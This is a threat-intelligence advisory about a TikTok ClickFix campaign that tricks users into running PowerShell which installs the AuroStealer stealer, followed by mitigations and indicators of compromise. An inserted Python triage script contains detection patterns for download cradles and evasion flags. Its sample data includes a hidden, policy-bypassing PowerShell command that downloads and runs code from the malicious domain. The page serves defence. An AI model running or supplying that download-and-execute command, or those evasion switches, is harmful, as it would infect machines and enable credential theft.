
TikTok Videos Promoting Malware Installation

Medium
Published: Tue Oct 21 2025 (10/21/2025, 15:38:59 UTC)
Source: AlienVault OTX General

Description

Attackers are leveraging TikTok videos to distribute malware by masquerading as free software activations. The campaign uses social engineering to convince users to run malicious PowerShell scripts that download additional payloads, including the AuroStealer information stealer. Persistence is established via scheduled tasks, and one payload uses a self-compiling technique to inject shellcode directly into memory, evading detection. Multiple TikTok videos target various software products, employing the ClickFix technique to increase user trust. This threat exploits user interaction and social engineering on a popular platform, posing a medium risk due to its potential to compromise confidentiality and integrity. European organizations with users active on TikTok and those using targeted software products are at risk. Mitigations include user education, PowerShell execution restrictions, monitoring scheduled tasks, and blocking malicious domains. Countries with high TikTok usage and significant software user bases, such as Germany, France, and the UK, are more likely to be affected.

AI-Powered Analysis

Last updated: 10/21/2025, 16:22:41 UTC

Technical Analysis

This threat involves a malware distribution campaign exploiting TikTok videos to trick users into installing malicious software disguised as free activations for popular software products. Attackers employ social engineering tactics to persuade victims to execute malicious PowerShell commands, which then download additional payloads including AuroStealer, a known information-stealing malware. The malware establishes persistence by creating scheduled tasks on the victim's system, ensuring continued execution after reboots. A notable technical aspect is the use of a self-compiling payload that dynamically generates code to inject shellcode directly into memory, a technique that helps evade traditional file-based detection mechanisms. The campaign leverages the ClickFix technique, which likely refers to social engineering methods that exploit user trust and interaction patterns to increase infection rates. Multiple TikTok videos have been identified as vectors, each targeting different software products, indicating a broad and adaptable campaign. Indicators of compromise include specific file hashes and a malicious domain (slmgr.win) used to host payloads. The attack chain involves initial user interaction, PowerShell script execution, payload download, persistence setup, and in-memory code injection, combining multiple MITRE ATT&CK techniques such as T1059.001 (PowerShell), T1547.001 (Scheduled Tasks), T1055 (Process Injection), and T1204.003 (User Execution). Although no CVSS score is assigned, the campaign's reliance on social engineering and user interaction limits its ease of exploitation but poses significant risks to confidentiality and integrity if successful.

Potential Impact

For European organizations, this threat can lead to significant data breaches due to the AuroStealer payload, which is designed to exfiltrate sensitive information such as credentials and personal data. The persistence mechanisms and in-memory shellcode injection complicate detection and remediation efforts, potentially allowing prolonged unauthorized access. Organizations with employees who use TikTok or download software activations from untrusted sources are particularly vulnerable. The campaign could disrupt business operations if malware payloads interfere with system stability or network security. Additionally, compromised credentials can facilitate lateral movement within networks, increasing the risk of broader intrusions. The social engineering vector also highlights the risk of insider threats or inadvertent user compromise, which can be challenging to mitigate purely through technical controls. The medium severity reflects the balance between the need for user interaction and the potentially severe consequences of successful infections.

Mitigation Recommendations

1. Conduct targeted user awareness training focusing on the risks of downloading software from unofficial sources and executing scripts from untrusted platforms like TikTok.
2. Implement strict PowerShell execution policies, such as enabling constrained language mode and logging all PowerShell activity for anomaly detection.
3. Monitor and audit scheduled tasks regularly to detect unauthorized persistence mechanisms.
4. Employ endpoint detection and response (EDR) solutions capable of detecting in-memory code injection and self-compiling payload behaviors.
5. Block access to known malicious domains such as slmgr.win at the network perimeter and DNS level.
6. Use application whitelisting to prevent unauthorized execution of scripts and binaries.
7. Integrate threat intelligence feeds containing the provided file hashes and indicators to enhance detection capabilities.
8. Encourage the use of official software activation channels and discourage the use of cracked or pirated software.
9. Regularly update and patch systems to reduce the attack surface, even though no specific vulnerabilities are exploited here.
10. Establish incident response procedures to quickly isolate and remediate infected systems upon detection.
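A small triage script that applies recommendations 2, 3 and 5 to scheduled-task records, added here as an example and not part of the source pulse: it flags task actions that reference the reported domain slmgr.win, use a PowerShell download cradle, or carry hidden-window / policy-bypass switches. The task records, the pattern lists and the scoring rule are constructed for illustration.

```python
"""Scheduled-task triage helper (added example, not from the source pulse).
Scans constructed task records for the behaviours the analysis describes:
PowerShell download cradles, references to the reported domain slmgr.win,
and PowerShell launched with hidden-window or execution-policy-bypass flags."""
import re

# Domain IoC taken from the page; everything else below is constructed.
BLOCKED_DOMAINS = {"slmgr.win"}

# Common PowerShell download-cradle verbs and evasion switches (assumed list).
CRADLE_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bcurl\b|DownloadString|DownloadFile|"
    r"Invoke-Expression|\biex\b)", re.IGNORECASE)
EVASION_RE = re.compile(
    r"(-ExecutionPolicy\s+Bypass|-ep\s+bypass|-WindowStyle\s+Hidden|"
    r"-w\s+hidden|-EncodedCommand|-enc\b)", re.IGNORECASE)
DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def score_command(cmd: str) -> dict:
    """Return triage findings for one task action / command line."""
    findings = []
    hosts = {h.lower() for h in DOMAIN_RE.findall(cmd)}
    if hosts & BLOCKED_DOMAINS:
        findings.append("known-bad-domain")
    if CRADLE_RE.search(cmd):
        findings.append("download-cradle")
    if EVASION_RE.search(cmd):
        findings.append("evasion-flags")
    # A known-bad domain alone is enough; otherwise require two behaviours.
    suspicious = "known-bad-domain" in findings or len(findings) >= 2
    return {"findings": findings, "hosts": sorted(hosts), "suspicious": suspicious}


def triage_tasks(tasks: list) -> list:
    """Return the tasks (name + findings) that deserve an analyst's look."""
    hits = []
    for t in tasks:
        result = score_command(t["action"])
        if result["suspicious"]:
            hits.append({"name": t["name"], **result})
    return hits


# Constructed sample records in the shape of schtasks/Get-ScheduledTask output.
SAMPLE_TASKS = [
    {"name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "action": "%windir%\\system32\\defrag.exe -c -h -k -g -$"},
    {"name": "\\Updater", "action": "powershell.exe -w hidden -ep bypass -c "
     "\"iex (iwr http://slmgr.win/photoshop -UseBasicParsing)\""},
    {"name": "\\Backup", "action": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for hit in triage_tasks(SAMPLE_TASKS):
        print(hit)
```

On a live host the same scoring can be fed from `schtasks /query /fo CSV /v` or `Get-ScheduledTask | Get-ScheduledTaskInfo` exports instead of the constructed list.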


Technical Details

Author: AlienVault
TLP: white
References: https://isc.sans.edu/diary/32380
Adversary: none listed
Pulse Id: 68f7a913d01518d5cfc73c23
Threat Score: none

Indicators of Compromise

Hash


Url

http://slmgr.win/photoshop

Domain

slmgr.win

Threat ID: 68f7b2cca08cdec9507429fa

Added to database: 10/21/2025, 4:20:28 PM

Last enriched: 10/21/2025, 4:22:41 PM

Last updated: 10/30/2025, 10:59:33 AM

Views: 58
